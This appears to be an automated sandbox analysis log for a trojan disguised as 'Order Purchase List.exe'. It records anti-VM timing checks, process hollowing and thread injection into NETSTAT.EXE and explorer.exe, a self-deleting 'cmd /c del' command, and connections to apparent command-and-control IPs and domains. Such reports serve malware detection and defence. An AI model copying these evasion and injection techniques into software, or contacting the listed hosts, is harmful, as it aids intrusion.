          Source: Order Purchase List.exe, 0000000A.00000000.315478812.0000000000B00000.00000002.00020000.sdmp, Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe
          Source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Order Purchase List.exe
          Source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp, Binary or memory string: OriginalFilenamenetstat.exej% vs Order Purchase List.exe
          Source: Order Purchase List.exe, Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe
          Source: Order Purchase List.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Order Purchase List.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Order Purchase List.exe, Virustotal: Detection: 34%
          Source: Order Purchase List.exe, Metadefender: Detection: 40%
          Source: Order Purchase List.exe, ReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Users\user\Desktop\Order Purchase List.exe 'C:\Users\user\Desktop\Order Purchase List.exe'
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Process created: C:\Users\user\Desktop\Order Purchase List.exe {path}
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order Purchase List.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\Order Purchase List.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order Purchase List.exe.log
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/1@6/4
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_01
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Order Purchase List.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Order Purchase List.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: Order Purchase List.exe, Static file information: File size 1104896 > 1048576
          Source: Order Purchase List.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order Purchase List.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10d000
          Source: Order Purchase List.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000013.00000003.395986362.00000000004F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0041B832 push eax; ret, 10_2_0041B838
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0041B83B push eax; ret, 10_2_0041B8A2
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0041B89C push eax; ret, 10_2_0041B8A2
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0040AA98 pushfd ; retf, 10_2_0040AA99
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0041B7E5 push eax; ret, 10_2_0041B838
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EBD0D1 push ecx; ret, 19_2_02EBD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02AFAA98 pushfd ; retf, 19_2_02AFAA99
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B0B89C push eax; ret, 19_2_02B0B8A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B0B832 push eax; ret, 19_2_02B0B838
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B0B83B push eax; ret, 19_2_02B0B8A2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B0B7E5 push eax; ret, 19_2_02B0B838
          Source: initial sample, Static PE information: section name: .text entropy: 7.614432754

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: /c del 'C:\Users\user\Desktop\Order Purchase List.exe'
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Order Purchase List.exe, RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order Purchase List.exe, RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000002AF8614 second address: 0000000002AF861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, RDTSC instruction interceptor: First address: 0000000002AF89AE second address: 0000000002AF89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order Purchase List.exe, TID: 4536, Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe, Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Last function: Thread delayed
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Process information queried: ProcessInformation
          Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.359000138.0000000008778000.00000004.00000001.sdmp, Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 0000000C.00000000.335317207.00000000067C2000.00000004.00000001.sdmp, Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp, Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000C.00000000.335317207.00000000067C2000.00000004.00000001.sdmp, Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: NETSTAT.EXE, 00000013.00000002.537333891.0000000000408000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
          Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp, Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E73D34 mov eax, dword ptr fs:[00000030h]19_2_02E73D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02E6AD30 mov eax, dword ptr fs:[00000030h]19_2_02E6AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 19_2_02EEA537 mov eax, dword ptr fs:[00000030h]19_2_02EEA537
          Source: C:\Users\user\Desktop\Order Purchase List.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Users\user\Desktop\Order Purchase List.exe Code function: 10_2_00409B50 LdrLoadDll, 10_2_00409B50
          Source: C:\Users\user\Desktop\Order Purchase List.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 154.23.204.56 80
          Source: C:\Windows\explorer.exe Domain query: www.hottorchlighter.com
          Source: C:\Windows\explorer.exe Domain query: www.auxiliacapitalpartnersllc.com
          Source: C:\Windows\explorer.exe Domain query: www.bigbigsea.com
          Source: C:\Windows\explorer.exe Domain query: www.inatividigitali.com
          Source: C:\Windows\explorer.exe Network Connect: 104.21.44.253 80
          Source: C:\Windows\explorer.exe Network Connect: 68.178.221.206 80
          Source: C:\Windows\explorer.exe Domain query: www.greatamericanlandworks.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Order Purchase List.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 140000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Order Purchase List.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Order Purchase List.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Order Purchase List.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\Order Purchase List.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Order Purchase List.exe Memory written: C:\Users\user\Desktop\Order Purchase List.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Order Purchase List.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Order Purchase List.exe Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\Order Purchase List.exe Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\Order Purchase List.exe Process created: C:\Users\user\Desktop\Order Purchase List.exe {path}
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order Purchase List.exe'
          Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.330532888.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
          Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.352067897.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000013.00000002.543686989.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000C.00000000.359000138.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Users\user\Desktop\Order Purchase List.exe VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
